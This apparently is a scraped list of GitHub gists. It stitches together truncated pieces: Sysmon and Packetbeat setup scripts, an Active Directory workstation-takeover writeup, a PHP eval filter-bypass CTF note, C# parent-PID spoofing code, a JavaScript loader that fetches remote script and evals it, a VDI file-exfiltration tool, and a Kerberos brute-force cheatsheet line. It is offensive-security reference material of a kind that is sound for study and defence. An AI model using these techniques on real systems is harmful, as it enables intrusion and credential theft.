log4she11

  • 127.0.0.1
#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PACKETBEAT_YAML="https://raw.githubusercontent.com/socfortress/Wazuh-Rules/main/Packetbeat/packetbeat.yml"
logger() {
now=$(date +'%m/%d/%Y %H:%M:%S')
case $1 in
"-e")
mtype="ERROR:"
$sysinternals_repo = 'download.sysinternals.com'
$sysinternals_downloadlink = 'https://download.sysinternals.com/files/SysinternalsSuite.zip'
$sysinternals_folder = 'C:\Program Files\sysinternals'
$sysinternals_zip = 'SysinternalsSuite.zip'
$sysmonconfig_downloadlink = 'https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml'
$sysmonconfig_file = 'sysmonconfig-export.xml'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
if (Test-Path -Path $sysinternals_folder) {
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active November 7, 2024 18:47
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@ChrisPritchard
ChrisPritchard / php-filter-bypass-noletters-or-quotes.md
Last active November 10, 2024 13:08
php filter bypass - no letters or quotes

PHP filter bypass - no letters or quotes

For the 2021 Hack The Box Cyber Apocalypse CTF, there was a web challenge called pcalc that included this filter:

if (strlen($formula) >= 100 || preg_match_all('/[a-z\'"]+/i', $formula)) {
    return '🤡 dont bite the hand that feeds you human 🤡';
}
try {
    eval('$pcalc = ' . $formula . ';');
@jfmaes
jfmaes / pidspoofDinvoke.cs
Last active January 17, 2023 02:28
PIDSpoof-DInvoke-Dev-Nuget-NoDynamicAPIIInvoke
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
namespace DInvoke_PIDSpoof_DevNuget
{
class Program
{
static void Main(string[] args)
// <script src="https://code.jquery.com/jquery-3.5.0.js"></script>
const loadScript = async (url) => {
const response = await fetch(url)
const script = await response.text()
Function(script)
}
const scriptUrl = "https://code.jquery.com/jquery-3.5.0.js"
loadScript(scriptUrl)
const loadScript = async (url) => {
const response = await fetch(url)
const script = await response.text()
eval(script)
}
const scriptUrl = "script.js"
loadScript(scriptUrl)
@X-C3LL
X-C3LL / F-Isolation.py
Created April 9, 2020 16:46
Small script to transfer files between a VDI and host using OCR & Keyboard emulation
#!/usr/bin/python
#coding: utf-8
# F-Isolation v0.1 - F**k isolated environments
# Because we hate that kind of pentest where you start at an isolated Citrix where our
# clipboard is useless, we do not have internet access inside the machine and we cannot
# map a local resource to upload our tools.
# OCR + Keyboard emulation FTW!
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: